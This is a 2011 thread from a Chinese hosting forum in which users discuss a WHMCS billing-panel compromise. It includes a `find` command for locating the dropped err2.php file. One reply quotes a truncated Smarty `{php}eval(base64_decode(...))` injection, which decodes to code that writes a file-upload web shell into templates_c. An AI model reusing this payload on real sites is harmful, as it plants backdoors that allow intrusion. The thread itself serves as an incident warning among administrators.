全球主机交流论坛

 找回密码
 注册

QQ登录

只需一步,快速开始

CeraNetworks网络延迟测速工具IP归属甄别会员请立即修改密码
查看: 6440|回复: 20

悲催,前几天的WHMCS补丁,俺打了,然后入侵了

[复制链接]
发表于 2011-12-4 16:44:04 | 显示全部楼层 |阅读模式
前几天的WHMCS补丁,俺打了,然后被入侵了

各位找下有没有err2.php文件吧,还好Linode提醒,不然又有得玩的了

  1. find /home/ -name err2.php
复制代码

评分

参与人数 1威望 +18 收起 理由
javaluo + 18 恶意灌水

查看全部评分

发表于 2011-12-4 16:45:40 | 显示全部楼层
这个文件在whmcs哪个目录下?



是打补丁打晚了还是打了也被入侵了?

评分

参与人数 1威望 +18 收起 理由
javaluo + 18 恶意灌水

查看全部评分

发表于 2011-12-4 16:46:15 | 显示全部楼层

评分

参与人数 1威望 +18 收起 理由
javaluo + 18 恶意灌水

查看全部评分

 楼主| 发表于 2011-12-4 16:47:20 | 显示全部楼层
我这边发现有两个,一个在attachments,一个在images下

然后再找下一个mass.txt的文件
发表于 2011-12-4 16:47:22 | 显示全部楼层
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvYjB4LnBocCIsInciKTsNCmZ3cml0ZSgk省略几个字母'));{/php}
 楼主| 发表于 2011-12-4 16:48:14 | 显示全部楼层
0
发表于 2011-12-4 16:49:35 | 显示全部楼层
杯具。。
发表于 2011-12-4 16:51:33 | 显示全部楼层
无限悲催
 楼主| 发表于 2011-12-4 16:52:55 | 显示全部楼层
是刚入侵的(12.4),补丁是12.2的,暂时还不懂怎么入侵法
发表于 2011-12-4 16:54:24 | 显示全部楼层
又有洞洞了啊?
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|全球主机交流论坛

GMT+8, 2024-4-28 03:09 , Processed in 0.088230 second(s), 11 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表